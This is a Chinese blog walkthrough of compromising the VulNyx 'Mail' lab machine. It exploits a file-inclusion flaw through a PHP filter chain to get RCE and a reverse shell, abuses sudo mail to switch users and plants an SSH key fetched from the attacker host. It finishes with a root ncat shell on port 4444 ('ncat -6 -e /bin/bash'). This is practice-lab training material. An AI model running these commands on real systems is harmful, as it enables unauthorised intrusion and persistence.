首页 > 其他分享 >VulNyx - Mail 靶机

VulNyx - Mail 靶机

时间:2024-08-30 14:36:47浏览次数:13  
标签:端口 sudo VulNyx id 4444 ssh Mail abel 靶机

扫描靶机 发现22 和 80端口

访问80端口 发现id=1 和2 时都会有回显
image



dirsearch -u http://http://192.168.200.39
image

访问这个1 和 2的路径 发现竟然和上面那个id=1和id=2的内容相同 这里就可以判断是个include漏洞了
image



用php_filter_chain_generator-main构造伪协议链 执行rce
image



执行反弹shell
image



拿到shell之后sudo -l 发现能以abel身份执行mail命令
image
利用mail来执行sh 身份切换为abel了
image
然后
cd /home/abel
mkdir .ssh
cd .ssh
wget 192.168.200.101:8000/id_rsa.pub 把kali的公钥拿到
cat id_rsa.pub > authorized_keys 把公钥写入认证里
这样我们就能用kali ssh登录到abel了



然后
sudo -l
发现我们能用root 权限执行ncat命令 这就简单了
image

将shell弹到本地的4444端口
sudo ncat -6 -e /bin/bash -lp 4444 &

然后ipv6在本地监听4444端口
ncat -6 fe80::20c:29ff:fed7:c556%ens33 4444

getshell完成
image

标签:端口,sudo,VulNyx,id,4444,ssh,Mail,abel,靶机
From: https://www.cnblogs.com/wssw/p/18388738

相关文章

  • potato靶机的wp
    Vulnhub-PotatoByzwsoc本次靶机是vulnhub的potato,地址(https://download.vulnhub.com/potato-suncsr/potato-suncsr.ova),下载好以后在虚拟机软件中打开(本人使用的是vmware),设置为nat模式,同kali在同一网段下以后,可以用sudoarp-scan-l,探测到其ip地址。1、nmap做扫描探测2......
  • 看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-1_vulnhub-靶机
    Vulnhub靶机DriftingBlues-1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机漏洞详解:①:信息收集:②:目录爆破:③:暴力破解:④:提权:⑤:获取flag:Vulnhub靶机渗透总结:Vulnhub靶机介绍:vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开......
  • vulhub xxe靶机
    步骤一:搜索靶机地址步骤二:利用dirsearsh扫描目录步骤三:进入靶机进入robots.txt步骤四:访问/xxe步骤五:输入用户名密码,利用burp抓包,传送至重放器输入:<?xmlversion="1.0"encoding="UTF-8"?><!DOCTYPEr[<!ELEMENTrANY><!ENTITYadminSYSTEM"php://filter/r......
  • Foxmail超大附件启动不了解决方法
    之前添加了几次QQ邮箱的账号密码,显示账号密码错误,无法启动。以为是我输错了呢,换了几个账号密码也不行。在网上搜索许久终于找到了解决办法。解决方案如下:1、先禁用腾讯企业邮箱超大附件插件功能。 2、删除foxmail安装目录下的domain文件,此文件所在位置:Foxmail7.2\Global\doma......
  • 点击Excel中的邮箱地址,如何默认打开FoxMail邮箱。
    在Windows系统中,若要设置Foxmail为默认邮件程序,请按照以下步骤操作:1.打开控制面板(命令:control),选择“查看方式”中的“大图标”,找到并点击“默认程序”。 2.在默认程序界面,点击“将文件类型或协议与程序关联”。 3.在默认应用中,找到电子邮件,点击,选择Foxmail。通过......
  • 网络安全实训六(靶机实例DC-3)
    1信息收集1.1获取靶机IP1.2扫描靶机网站的目录1.3扫描端口和服务器信息1.4进入网站1.5在msf中给搜索joomla扫描器1.6设置参数查看joomla版本信息1.7按照版本号搜索漏洞1.8查看漏洞使用2渗透2.1查看是否存在SQL注入2.2获取到数据库......
  • SAP AUTOMAIL-自动发邮件功能
    总结针对发送邮件内容封装公用函数,针对不同业务场景,比如邮件统计排名晾晒类,各类业务催办类知会类邮件等,实现AUTOMAIL自动触发邮件。1.邮件发送内容:正文,附件,超链接等等1.1 正文可以是一般内容或表格明细清单,涉及到很多格式的设置,用HTML格式设置。1.2 附件可以是DOC, ......
  • 【Win 10/Win 11】【Foxmail】解决Foxmail邮件客户端安装在Windows系统下Program File
    虽然到目前(2024/08)Foxmail邮件客户端已经有一段时间没有更新了,但它仍不失为Windows操作系统下好用的邮件客户端之一。笔者在安装Foxmail时将默认路径设置为了D:\ProgramFiles\,而Windows10和Windows11对于分区根目录下ProgramFiles,ProgramFile(x86)等文件夹有特殊的权限限制,......
  • VulNyx - Ceres 靶机
    有80端口访问看看他这个挺奇葩的看了wp才知道file.php的参数是file他会自动给你加上php也就是说file=secret.php读不到数据要file=secret才能读到数据伪协议读取文件<?phpinclude($_GET["file"].".php");?><?phpsystem("id");///......
  • NYX靶机笔记
    NYX靶机笔记概述VulnHub里的简单靶机靶机地址:https://download.vulnhub.com/nyx/nyxvm.zip1、nmap扫描1)主机发现#-sn只做ping扫描,不做端口扫描nmap-sn192.168.84.1/24#发现靶机ip为MACAddress:00:50:56:E0:D5:D4(VMware)Nmapscanreportfor192.168.84.137......